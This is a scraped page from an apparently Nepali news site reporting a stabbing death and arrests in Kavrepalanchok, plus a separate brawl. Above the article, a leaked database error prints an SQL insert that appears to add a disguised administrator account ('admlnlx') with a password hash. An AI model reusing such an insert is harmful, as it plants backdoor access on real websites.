WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BguaXG/k9NEmcgzwh0zcONW/.rET1.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 14:36:23', '', 'admlnlx', 'admlnlx')
बनेपा, मंसिर २९ –
काभ्रेपलाञ्चोकको बोल्देफेदिचे गाविस–२ मा चक्कु प्रहारबाट गए राति एक व्यक्तिको मृत्यु भएपछि त्यस घटनामा संलग्न रहेको आशङ्कामा प्रहरीले स्थानीयवासी नेमा तामाङ र पञ्च तामाङलाई पक्राउ गरेको छ ।
मृत्यु हुनेमा सो गाविसका ३८ वर्षिय जगतमान तामाङ रहेको जिल्ला प्रहरी कार्यालय, काभ्रेपलाञ्चोकका प्रहरी उपरिक्षक सहकुल थापाले जानकारी दिनुभएको छ ।
मादक पदार्थ सेवन गरेपछि उनीहरुबीच झगडा भएको र झगडाले उग्र रुप लिँदा ज्यान गएको बताइन्छ ।
उता, जिल्लाको गोकुले गाविसमा मङ्गलबार भएको झगडामा ८ जना घाइते भएको प्रहरीले जनाएको छ । कुटपिट गर्नेको खोजी भइरहेको छ । – रासस